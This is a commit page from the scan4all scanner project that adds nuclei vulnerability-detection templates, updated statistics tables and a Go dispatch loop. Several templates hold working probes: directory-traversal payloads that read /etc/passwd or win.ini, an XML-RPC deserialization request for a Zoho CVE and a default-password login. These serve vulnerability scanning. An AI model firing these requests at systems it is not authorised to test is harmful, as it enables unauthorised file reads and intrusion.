Skip to content

Commit 6b774cd

Browse files
committed
up PoCs 2022-09-06
1 parent 0b74458 commit 6b774cd

File tree

16 files changed

+2147
-1881
lines changed

16 files changed

+2147
-1881
lines changed

config/nuclei-templates/README.md

Lines changed: 12 additions & 12 deletions
Original file line numberDiff line numberDiff line change
@@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
4242

4343
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
4444
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
45-
| cve | 1388 | daffainfo | 630 | cves | 1363 | info | 1450 | http | 3773 |
46-
| panel | 642 | dhiyaneshdk | 558 | exposed-panels | 649 | high | 974 | file | 76 |
47-
| edb | 548 | pikpikcu | 326 | vulnerabilities | 510 | medium | 811 | network | 51 |
48-
| lfi | 496 | pdteam | 269 | technologies | 278 | critical | 469 | dns | 17 |
49-
| xss | 472 | geeknik | 187 | exposures | 273 | low | 219 | | |
50-
| wordpress | 415 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | |
51-
| exposure | 394 | 0x_akoko | 158 | misconfiguration | 217 | | | | |
52-
| cve2021 | 343 | princechaddha | 150 | workflows | 189 | | | | |
53-
| rce | 335 | pussycat0x | 133 | default-logins | 102 | | | | |
54-
| wp-plugin | 312 | ritikchaddha | 130 | file | 76 | | | | |
55-
56-
**294 directories, 4145 files**.
45+
| cve | 1414 | daffainfo | 630 | cves | 1389 | info | 1463 | http | 3823 |
46+
| panel | 649 | dhiyaneshdk | 577 | exposed-panels | 656 | high | 1000 | file | 76 |
47+
| edb | 557 | pikpikcu | 326 | vulnerabilities | 510 | medium | 811 | network | 51 |
48+
| lfi | 500 | pdteam | 269 | technologies | 280 | critical | 475 | dns | 17 |
49+
| xss | 486 | geeknik | 187 | exposures | 273 | low | 221 | | |
50+
| wordpress | 417 | dwisiswant0 | 169 | misconfiguration | 231 | unknown | 10 | | |
51+
| exposure | 404 | 0x_akoko | 162 | token-spray | 230 | | | | |
52+
| cve2021 | 350 | princechaddha | 150 | workflows | 189 | | | | |
53+
| rce | 335 | ritikchaddha | 135 | default-logins | 102 | | | | |
54+
| wp-plugin | 314 | pussycat0x | 133 | file | 76 | | | | |
55+
56+
**295 directories, 4195 files**.
5757

5858
</td>
5959
</tr>

config/nuclei-templates/TEMPLATES-STATS.json

Lines changed: 1 addition & 1 deletion
Large diffs are not rendered by default.

config/nuclei-templates/TEMPLATES-STATS.md

Lines changed: 1822 additions & 1813 deletions
Large diffs are not rendered by default.

config/nuclei-templates/TOP-10.md

Lines changed: 10 additions & 10 deletions
Original file line numberDiff line numberDiff line change
@@ -1,12 +1,12 @@
11
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
22
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
3-
| cve | 1388 | daffainfo | 630 | cves | 1363 | info | 1450 | http | 3773 |
4-
| panel | 642 | dhiyaneshdk | 558 | exposed-panels | 649 | high | 974 | file | 76 |
5-
| edb | 548 | pikpikcu | 326 | vulnerabilities | 510 | medium | 811 | network | 51 |
6-
| lfi | 496 | pdteam | 269 | technologies | 278 | critical | 469 | dns | 17 |
7-
| xss | 472 | geeknik | 187 | exposures | 273 | low | 219 | | |
8-
| wordpress | 415 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | |
9-
| exposure | 394 | 0x_akoko | 158 | misconfiguration | 217 | | | | |
10-
| cve2021 | 343 | princechaddha | 150 | workflows | 189 | | | | |
11-
| rce | 335 | pussycat0x | 133 | default-logins | 102 | | | | |
12-
| wp-plugin | 312 | ritikchaddha | 130 | file | 76 | | | | |
3+
| cve | 1414 | daffainfo | 630 | cves | 1389 | info | 1463 | http | 3823 |
4+
| panel | 649 | dhiyaneshdk | 577 | exposed-panels | 656 | high | 1000 | file | 76 |
5+
| edb | 557 | pikpikcu | 326 | vulnerabilities | 510 | medium | 811 | network | 51 |
6+
| lfi | 500 | pdteam | 269 | technologies | 280 | critical | 475 | dns | 17 |
7+
| xss | 486 | geeknik | 187 | exposures | 273 | low | 221 | | |
8+
| wordpress | 417 | dwisiswant0 | 169 | misconfiguration | 231 | unknown | 10 | | |
9+
| exposure | 404 | 0x_akoko | 162 | token-spray | 230 | | | | |
10+
| cve2021 | 350 | princechaddha | 150 | workflows | 189 | | | | |
11+
| rce | 335 | ritikchaddha | 135 | default-logins | 102 | | | | |
12+
| wp-plugin | 314 | pussycat0x | 133 | file | 76 | | | | |
Lines changed: 34 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,34 @@
1+
id: CVE-2014-8676
2+
3+
info:
4+
name: Simple Online Planning Tool 1.3.2 - Directory Traversal
5+
author: 0x_Akoko
6+
severity: medium
7+
description: |
8+
Directory traversal vulnerability in the file_get_contents function in SOPlanning 1.32 and earlier allows remote attackers to determine the existence of arbitrary files via a .. (dot dot) in a URL path parameter.
9+
reference:
10+
- https://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html
11+
- https://nvd.nist.gov/vuln/detail/CVE-2014-8676
12+
- https://www.exploit-db.com/exploits/37604/
13+
- http://seclists.org/fulldisclosure/2015/Jul/44
14+
classification:
15+
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
16+
cvss-score: 5.3
17+
cve-id: CVE-2014-8676
18+
cwe-id: CWE-22
19+
tags: cve,cve2014,soplanning,lfi,packetstorm
20+
21+
requests:
22+
- method: GET
23+
path:
24+
- "{{BaseURL}}/process/feries.php?fichier=../../../../../../../etc/passwd"
25+
26+
matchers-condition: and
27+
matchers:
28+
- type: regex
29+
regex:
30+
- "root:[x*]:0:0"
31+
32+
- type: status
33+
status:
34+
- 200
Lines changed: 32 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,32 @@
1+
id: CVE-2015-7245
2+
3+
info:
4+
name: D-Link DVG-N5402SP - Path Traversal
5+
author: 0x_Akoko
6+
severity: high
7+
description: |
8+
Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter.
9+
reference:
10+
- https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html
11+
- https://www.exploit-db.com/exploits/39409/
12+
- https://nvd.nist.gov/vuln/detail/CVE-2015-7245
13+
classification:
14+
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
15+
cvss-score: 7.5
16+
cve-id: CVE-2015-7245
17+
cwe-id: CWE-22
18+
tags: cve,cve2015,dlink,lfi,packetstorm,edb
19+
20+
requests:
21+
- raw:
22+
- |
23+
POST /cgibin/webproc HTTP/1.1
24+
Host: {{Hostname}}
25+
26+
getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh
27+
28+
matchers:
29+
- type: regex
30+
part: body
31+
regex:
32+
- "root:.*:0:0:"

config/nuclei-templates/cves/2016/CVE-2016-6601.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -14,7 +14,7 @@ info:
1414
cvss-score: 7.5
1515
cve-id: CVE-2016-6601
1616
cwe-id: CWE-22
17-
tags: cve,cve2016,zoho,lfi,webnms
17+
tags: edb,cve,cve2016,zoho,lfi,webnms
1818

1919
requests:
2020
- method: GET
Lines changed: 32 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,32 @@
1+
id: CVE-2021-35380
2+
3+
info:
4+
name: TermTalk Server 3.24.0.2 - Unauthenticated Arbitrary File Read
5+
author: fxploit
6+
severity: high
7+
description: |
8+
A Directory Traversal vulnerability exists in Solari di Udine TermTalk Server (TTServer) 3.24.0.2, which lets an unauthenticated malicious user gain access to the files on the remote system by gaining access to the relative path of the file they want to download.
9+
reference:
10+
- https://www.swascan.com/solari-di-udine/
11+
- https://www.exploit-db.com/exploits/50638
12+
- https://nvd.nist.gov/vuln/detail/CVE-2021-35380
13+
classification:
14+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
15+
cvss-score: 7.5
16+
cve-id: CVE-2021-35380
17+
cwe-id: CWE-22
18+
tags: cve,cve2022,termtalk,lfi,unauth,lfr,edb
19+
20+
requests:
21+
- method: GET
22+
path:
23+
- "{{BaseURL}}/file?valore=../../../../../windows/win.ini"
24+
25+
matchers:
26+
- type: word
27+
part: body
28+
words:
29+
- "bit app support"
30+
- "fonts"
31+
- "extensions"
32+
condition: and

config/nuclei-templates/cves/2022/CVE-2022-31269.yaml

Lines changed: 3 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -12,7 +12,10 @@ info:
1212
- https://nvd.nist.gov/vuln/detail/CVE-2022-31269
1313
- https://eg.linkedin.com/in/omar-1-hashem
1414
classification:
15+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
16+
cvss-score: 8.2
1517
cve-id: CVE-2022-31269
18+
cwe-id: CWE-798
1619
metadata:
1720
shodan-query: http.title:"Linear eMerge"
1821
verified: "true"

config/nuclei-templates/cves/2022/CVE-2022-31798.yaml

Lines changed: 4 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -3,15 +3,18 @@ id: CVE-2022-31798
33
info:
44
name: Nortek Linear eMerge E3-Series - XSS
55
author: ritikchaddha
6-
severity: high
6+
severity: medium
77
description: |
88
There is local session fixation that chained with reflected cross-site scripting leads to account take over of admin or less privileged users.
99
reference:
1010
- https://packetstormsecurity.com/files/167992/
1111
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31798
1212
- http://packetstormsecurity.com/files/167992/Nortek-Linear-eMerge-E3-Series-Account-Takeover.html
1313
classification:
14+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
15+
cvss-score: 6.1
1416
cve-id: CVE-2022-31798
17+
cwe-id: CWE-79
1518
metadata:
1619
shodan-query: http.title:"eMerge"
1720
verified: "true"
Lines changed: 58 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,58 @@
1+
id: CVE-2022-35405
2+
3+
info:
4+
name: Zoho ManageEngine Password Manager Pro - Unauthenticated Remote Command Execution
5+
author: true13
6+
severity: critical
7+
description: |
8+
This is a de-serialization vulnerability that causes unauthenticated RCE in XML-RPC of Zoho Manage Engine Password Manager Pro.
9+
reference:
10+
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/zoho_password_manager_pro_xml_rpc_rce.rb
11+
- https://xz.aliyun.com/t/11578
12+
- https://nvd.nist.gov/vuln/detail/CVE-2022-35405
13+
- https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html
14+
classification:
15+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
16+
cvss-score: 9.8
17+
cve-id: CVE-2022-35405
18+
metadata:
19+
shodan-query: http.title:"ManageEngine Password"
20+
tags: cve,cve2022,rce,zoho,passwordmanager,deserialization,unauth,msf
21+
22+
requests:
23+
- raw:
24+
- |
25+
POST /xmlrpc HTTP/1.1
26+
Host: {{Hostname}}
27+
Content-Type: text/xml
28+
29+
<?xml version="1.0"?>
30+
<methodCall>
31+
<methodName>ProjectDiscovery</methodName>
32+
<params>
33+
<param>
34+
<value>
35+
<struct>
36+
<member>
37+
<name>test</name>
38+
<value>
39+
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions"></serializable>
40+
</value>
41+
</member>
42+
</struct>
43+
</value>
44+
</param>
45+
</params>
46+
</methodCall>
47+
48+
matchers-condition: and
49+
matchers:
50+
- type: word
51+
part: body
52+
words:
53+
- "Failed to read result object: null"
54+
55+
- type: word
56+
part: header
57+
words:
58+
- text/xml
Lines changed: 36 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,36 @@
1+
id: 3com-nj2000-default-login
2+
3+
info:
4+
name: 3COM NJ2000 Default Login
5+
author: daffainfo
6+
severity: high
7+
description: 3COM NJ2000 default admin credentials were discovered.
8+
reference:
9+
- https://www.manualslib.com/manual/204158/3com-Intellijack-Nj2000.html?page=12
10+
metadata:
11+
verified: true
12+
shodan-query: http.title:"ManageEngine Password"
13+
fofa-query: body="NJ2000"
14+
tags: default-login,3com,nj2000
15+
16+
requests:
17+
- raw:
18+
- |
19+
POST /login.html HTTP/1.1
20+
Host: {{Hostname}}
21+
Content-Type: application/x-www-form-urlencoded
22+
23+
password=password
24+
25+
matchers-condition: and
26+
matchers:
27+
- type: word
28+
part: body
29+
words:
30+
- '<title>3Com Corporation Web Interface</title>'
31+
- '<frame name="mainFrame" src="blank.html">'
32+
condition: and
33+
34+
- type: status
35+
status:
36+
- 200
Lines changed: 30 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,30 @@
1+
id: cvent-panel-detect
2+
3+
info:
4+
name: Cvent Panel Detect
5+
author: tess
6+
severity: info
7+
metadata:
8+
verified: true
9+
shodan-query: http.html:"Cvent Inc"
10+
tags: panel,cvent
11+
12+
requests:
13+
- method: GET
14+
path:
15+
- '{{BaseURL}}'
16+
- '{{BaseURL}}/Login.aspx'
17+
- '{{BaseURL}}/manager/login.aspx'
18+
- '{{BaseURL}}/GDSHost/Default.aspx'
19+
- '{{BaseURL}}/events/EventRsvp.aspx'
20+
21+
stop-at-first-match: true
22+
redirects: true
23+
max-redirects: 2
24+
matchers:
25+
- type: word
26+
part: body
27+
words:
28+
- "Cvent Inc"
29+
- "Cvent, Inc."
30+
condition: or
Lines changed: 25 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,25 @@
1+
id: omniampx-panel
2+
3+
info:
4+
name: Omnia Node MPX - Panel
5+
author: arafatansari
6+
severity: info
7+
metadata:
8+
verified: true
9+
shodan-query: http.html:"Omnia MPX"
10+
tags: panel,omnia,omniampx
11+
12+
requests:
13+
- method: GET
14+
path:
15+
- '{{BaseURL}}/login'
16+
17+
matchers-condition: and
18+
matchers:
19+
- type: word
20+
words:
21+
- "Omnia MPX Node | Login"
22+
23+
- type: status
24+
status:
25+
- 200

engine/engine.go

Lines changed: 47 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,47 @@
1+
package engine
2+
3+
import (
4+
"github.com/hktalent/scan4all/lib/util"
5+
"github.com/hktalent/scan4all/pocs_go"
6+
"log"
7+
)
8+
9+
// 引擎总入口
10+
func init() {
11+
util.RegInitFunc(func() {
12+
// 异步启动一个线程处理检测,避免
13+
go func() {
14+
//nMax := 120 // 等xxx秒都没有消息进入就退出
15+
//nCnt := 0
16+
for {
17+
select {
18+
case <-util.Ctx_global.Done():
19+
close(util.PocCheck_pipe)
20+
return
21+
case x1, ok := <-util.PocCheck_pipe:
22+
if util.GetValAsBool("NoPOC") || nil == x1 || !ok {
23+
//close(util.PocCheck_pipe) // 这行会在 NoPOC该标志开启时,其他进程无法传递过来而出错
24+
log.Println("go_poc_checkout is over")
25+
continue
26+
}
27+
//nCnt = 0
28+
log.Printf("<-lib.PocCheck_pipe: %+v %s", *x1.Wappalyzertechnologies, x1.URL)
29+
util.DoSyncFunc(func() {
30+
func(x99 *util.PocCheck) {
31+
pocs_go.POCcheck(*x99.Wappalyzertechnologies, x99.URL, x99.FinalURL, x99.Checklog4j)
32+
}(x1)
33+
})
34+
default:
35+
//var f01 float32 = float32(nCnt) / float32(nMax) * float32(100)
36+
//fmt.Printf(" Asynchronous go PoCs detection task %%%0.2f ....\r", f01)
37+
//<-time.After(time.Duration(1) * time.Second)
38+
//nCnt += 1
39+
//if nMax <= nCnt {
40+
// close(util.PocCheck_pipe)
41+
// return
42+
//}
43+
}
44+
}
45+
}()
46+
})
47+
}

0 commit comments

Comments
 (0)